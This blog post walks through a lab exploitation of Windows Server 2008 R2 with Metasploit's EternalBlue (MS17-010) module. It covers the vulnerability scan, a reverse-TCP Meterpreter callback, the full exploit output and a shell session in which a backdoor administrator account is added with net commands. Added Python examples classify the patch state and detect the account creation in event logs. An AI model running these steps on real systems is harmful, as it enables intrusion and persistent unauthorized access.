Pentesting Windows Server 2008 R2: MS17-010 (EternalBlue)
┌──(root💀laizr)-[~]
└─# msfconsole
[msfconsole ASCII-art banner]
=[ metasploit v6.0.15-dev ]
+ -- --=[ 2071 exploits - 1123 auxiliary - 352 post ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops ]
+ -- --=[ 7 evasion ]
Metasploit tip: Use the edit command to open the currently active module in your editor
msf6 > set RHOSTS 172.16.16.129
RHOSTS => 172.16.16.129
msf6 > run
[-] Unknown command: run.
msf6 > use auxiliary/scanner/smb/smb_ms17_010
msf6 auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 172.16.16.129
RHOSTS => 172.16.16.129
msf6 auxiliary(scanner/smb/smb_ms17_010) > run
[+] 172.16.16.129:445 - Host is likely VULNERABLE to MS17-010! - Windows Web Server 2008 R2 7601 Service Pack 1 x64 (64-bit)
[*] 172.16.16.129:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
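What the "likely VULNERABLE" verdict above actually rests on: the scanner sends an SMB1 TRANS2 request over an anonymous IPC$ session and looks at the NTSTATUS in the reply. An unpatched srv.sys answers STATUS_INSUFF_SERVER_RESOURCES (0xC0000205); a patched one answers STATUS_INVALID_PARAMETER or STATUS_NOT_IMPLEMENTED. The Python below is an added example, not Metasploit's Ruby module: it parses the SMB1 header of such a reply and applies that rule. The packet bytes it builds are constructed fixtures, and it leaves out the module's network I/O and its DoublePulsar backdoor check. Running the check before the exploit, as the transcript does, matters: EternalBlue grooms the kernel's non-paged pool, and a failed attempt can crash the target.

```python
"""Classify a host's MS17-010 patch state from the NTSTATUS it returns to an
SMB1 TRANS2 probe, the signal auxiliary/scanner/smb/smb_ms17_010 keys on.
Added example, not the module's code; packets below are constructed."""
import struct

# NTSTATUS values (Windows SDK) the probe can come back with.
STATUS_NOT_IMPLEMENTED = 0xC0000002
STATUS_INVALID_PARAMETER = 0xC0000022
STATUS_INSUFF_SERVER_RESOURCES = 0xC0000205

SMB1_MAGIC = b"\xffSMB"
SMB_COM_TRANSACTION2 = 0x32
NETBIOS_SESSION_MESSAGE = 0x00


def parse_smb1_header(data: bytes):
    """Return (command, ntstatus) from a NetBIOS-framed SMB1 response.

    Layout: 4-byte NetBIOS session header (type, 3-byte big-endian length),
    then the 32-byte SMB1 header: magic(4) command(1) status(4) flags(1)
    flags2(2) pidhigh(2) signature(8) reserved(2) tid(2) pid(2) uid(2) mid(2),
    multi-byte fields little-endian."""
    if len(data) < 4 + 32:
        raise ValueError("short packet")
    msg_type, length = data[0], int.from_bytes(data[1:4], "big")
    if msg_type != NETBIOS_SESSION_MESSAGE:
        raise ValueError("not a NetBIOS session message")
    if length != len(data) - 4:
        raise ValueError("NetBIOS length field does not match payload")
    hdr = data[4:36]
    if hdr[:4] != SMB1_MAGIC:
        raise ValueError("not an SMB1 header")
    command, status = struct.unpack_from("<BI", hdr, 4)
    return command, status


def classify_ms17_010(response: bytes) -> str:
    """Apply the scanner's rule to the TRANS2 reply."""
    command, status = parse_smb1_header(response)
    if command != SMB_COM_TRANSACTION2:
        return "unknown (reply is not a TRANS2 response)"
    if status == STATUS_INSUFF_SERVER_RESOURCES:
        return "likely VULNERABLE"
    if status in (STATUS_INVALID_PARAMETER, STATUS_NOT_IMPLEMENTED):
        return "likely patched"
    return f"unknown (NTSTATUS 0x{status:08X})"


def build_trans2_response(status: int) -> bytes:
    """Construct a minimal TRANS2 response carrying the given NTSTATUS.
    Test fixture only: a real reply carries more bytes after the header."""
    hdr = SMB1_MAGIC + struct.pack("<BI", SMB_COM_TRANSACTION2, status)
    hdr += bytes([0x98]) + struct.pack("<H", 0xC807)            # flags, flags2
    hdr += b"\x00" * 2 + b"\x00" * 8 + b"\x00" * 2                # pidhigh, signature, reserved
    hdr += struct.pack("<HHHH", 0x0800, 0xFEFF, 0x0800, 0x0040)  # tid, pid, uid, mid
    body = b"\x00" + b"\x00\x00"                                  # wordcount 0, bytecount 0
    payload = hdr + body
    return bytes([NETBIOS_SESSION_MESSAGE]) + len(payload).to_bytes(3, "big") + payload


if __name__ == "__main__":
    for name, code in (("unpatched", STATUS_INSUFF_SERVER_RESOURCES),
                       ("patched", STATUS_INVALID_PARAMETER)):
        print(f"{name}: {classify_ms17_010(build_trans2_response(code))}")
```

Plugging a captured reply (the bytes read from the socket right after sending the TRANS2 request) into `classify_ms17_010` gives the same verdict msfconsole prints; anything other than the three known codes is reported as unknown rather than guessed.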
msf6 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 172.16.16.129 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The target port (TCP)
SMBDomain . no (Optional) The Windows domain to use for authentication
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target.
VERIFY_TARGET true yes Check if remote OS matches exploit Target.
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 172.16.16.46 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows 7 and Server 2008 R2 (x64) All Service Packs
msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhost 172.16.16.129
rhost => 172.16.16.129
msf6 exploit(windows/smb/ms17_010_eternalblue) > set lhost 172.16.16.46
lhost => 172.16.16.46
msf6 exploit(windows/smb/ms17_010_eternalblue) > set lport 4444
lport => 4444
msf6 exploit(windows/smb/ms17_010_eternalblue) > run
[*] Started reverse TCP handler on 172.16.16.46:4444
[*] 172.16.16.129:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 172.16.16.129:445 - Host is likely VULNERABLE to MS17-010! - Windows Web Server 2008 R2 7601 Service Pack 1 x64 (64-bit)
[*] 172.16.16.129:445 - Scanned 1 of 1 hosts (100% complete)
[*] 172.16.16.129:445 - Connecting to target for exploitation.
[+] 172.16.16.129:445 - Connection established for exploitation.
[+] 172.16.16.129:445 - Target OS selected valid for OS indicated by SMB reply
[*] 172.16.16.129:445 - CORE raw buffer dump (46 bytes)
[*] 172.16.16.129:445 - 0x00000000 57 69 6e 64 6f 77 73 20 57 65 62 20 53 65 72 76 Windows Web Serv
[*] 172.16.16.129:445 - 0x00000010 65 72 20 32 30 30 38 20 52 32 20 37 36 30 31 20 er 2008 R2 7601
[*] 172.16.16.129:445 - 0x00000020 53 65 72 76 69 63 65 20 50 61 63 6b 20 31 Service Pack 1
[+] 172.16.16.129:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 172.16.16.129:445 - Trying exploit with 12 Groom Allocations.
[*] 172.16.16.129:445 - Sending all but last fragment of exploit packet
[*] 172.16.16.129:445 - Starting non-paged pool grooming
[+] 172.16.16.129:445 - Sending SMBv2 buffers
[+] 172.16.16.129:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 172.16.16.129:445 - Sending final SMBv2 buffers.
[*] 172.16.16.129:445 - Sending last fragment of exploit packet!
[*] 172.16.16.129:445 - Receiving response from exploit packet
[+] 172.16.16.129:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 172.16.16.129:445 - Sending egg to corrupted connection.
[*] 172.16.16.129:445 - Triggering free of corrupted buffer.
[*] Sending stage (200262 bytes) to 172.16.16.129
[*] Meterpreter session 1 opened (172.16.16.46:4444 -> 172.16.16.129:49251) at 2021-01-18 19:12:27 +0800
[+] 172.16.16.129:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 172.16.16.129:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 172.16.16.129:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
meterpreter > shell
Process 2808 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>sysinfo
sysinfo
'sysinfo' is not recognized as an internal or external command,
operable program or batch file.
C:\Windows\system32>screenshot
screenshot
'screenshot' is not recognized as an internal or external command,
operable program or batch file.
(`sysinfo` and `screenshot` are Meterpreter commands: they have to be run at the `meterpreter >` prompt, not inside the cmd.exe channel opened by `shell`.)
C:\Windows\system32>net user
net user
User accounts for \\
-------------------------------------------------------------------------------
Administrator Guest
The command completed with one or more errors.
C:\Windows\system32>net user laizr 123.com /add
net user laizr 123.com /add
The command completed successfully.
C:\Windows\system32>net
C:\Windows\system32>sysinfo
sysinfo
'sysinfo' is not recognized as an internal or external command,
operable program or batch file.
C:\Windows\system32>net localgroup administrators laizr /add
net localgroup administrators laizr /add
The command completed successfully.
C:\Windows\system32>cd ..
cd ..
C:\Windows>cd...
cd...
C:\Windows>cd..
cd..
C:\>mkdir aaa
mkdir aaa
C:\>dir
dir
Volume in drive C has no label.
Volume Serial Number is 709C-5214
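The two `net` commands above (`net user laizr 123.com /add`, `net localgroup administrators laizr /add`) are the noisiest part of the session. With account-management and security-group-management auditing enabled, Server 2008 R2 records event 4720 (user account created) and event 4732 (member added to a security-enabled local group), and because the Meterpreter session from EternalBlue runs as SYSTEM, both are logged with the machine account as subject rather than a logged-on administrator. The Python below is an added example, not part of the original post: it correlates the two events over exported records (the shape `Get-WinEvent` or a SIEM would hand over). The host name, SIDs and timestamps are constructed.

```python
"""Correlate Windows Security events to catch a fresh local account (4720)
being added to the local Administrators group (4732) shortly afterwards.
Added example, not part of the original post; records are constructed."""
from datetime import datetime, timedelta

ADMINS_GROUP_SID = "S-1-5-32-544"  # built-in Administrators, same on every Windows host

# Constructed records with only the fields the correlation needs; times are UTC.
# "WEB2008R2$" is an assumed machine-account name for the target.
SAMPLE_EVENTS = [
    {"EventID": 4720, "Time": "2021-01-18T11:13:40", "SubjectUserName": "WEB2008R2$",
     "TargetUserName": "laizr", "TargetSid": "S-1-5-21-1111-2222-3333-1005"},
    {"EventID": 4732, "Time": "2021-01-18T11:14:02", "SubjectUserName": "WEB2008R2$",
     "TargetUserName": "Administrators", "TargetSid": ADMINS_GROUP_SID,
     "MemberSid": "S-1-5-21-1111-2222-3333-1005"},
    # benign: helpdesk creates an ordinary user and never elevates it
    {"EventID": 4720, "Time": "2021-01-18T09:00:00", "SubjectUserName": "helpdesk",
     "TargetUserName": "jdoe", "TargetSid": "S-1-5-21-1111-2222-3333-1004"},
    # benign: an existing account is added to Administrators, no recent 4720 for it
    {"EventID": 4732, "Time": "2021-01-18T09:30:00", "SubjectUserName": "itadmin",
     "TargetUserName": "Administrators", "TargetSid": ADMINS_GROUP_SID,
     "MemberSid": "S-1-5-21-1111-2222-3333-1001"},
]


def _ts(s: str) -> datetime:
    return datetime.fromisoformat(s)


def find_new_local_admins(events, window=timedelta(minutes=30)):
    """Return one finding per 4732 into Administrators whose member SID was
    created by a 4720 no more than `window` earlier. Correlating on the SID
    (4720.TargetSid == 4732.MemberSid) avoids relying on MemberName, which
    4732 frequently records as "-"."""
    created = {e["TargetSid"]: e for e in events if e["EventID"] == 4720}
    findings = []
    for e in events:
        if e["EventID"] != 4732 or e["TargetSid"] != ADMINS_GROUP_SID:
            continue
        c = created.get(e["MemberSid"])
        if c is None:
            continue
        gap = _ts(e["Time"]) - _ts(c["Time"])
        if timedelta(0) <= gap <= window:
            findings.append({
                "user": c["TargetUserName"],
                "sid": c["TargetSid"],
                "created": c["Time"],
                "elevated": e["Time"],
                "actor": e["SubjectUserName"],
                # a machine account (name ending in $) as actor means the change
                # came from the SYSTEM context, not a logged-on administrator
                "system_context": e["SubjectUserName"].endswith("$"),
            })
    return findings


if __name__ == "__main__":
    for f in find_new_local_admins(SAMPLE_EVENTS):
        print(f"{f['user']} created {f['created']}, made admin {f['elevated']} "
              f"by {f['actor']} (system context: {f['system_context']})")
```

The window is deliberately wide; the transcript shows the two commands seconds apart, but an operator who pauses to look around first still falls inside 30 minutes, and the `system_context` flag is what separates the EternalBlue case from a helpdesk ticket even when the timing looks ordinary.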
---------------------------Author: HelloBytes
About the author: a JavaEE newcomer, all advice welcome!
Copyright of this article is shared by the author and 博客园 (cnblogs). Reposting is welcome, but the original link and this notice must be kept; otherwise the right to pursue legal action is reserved.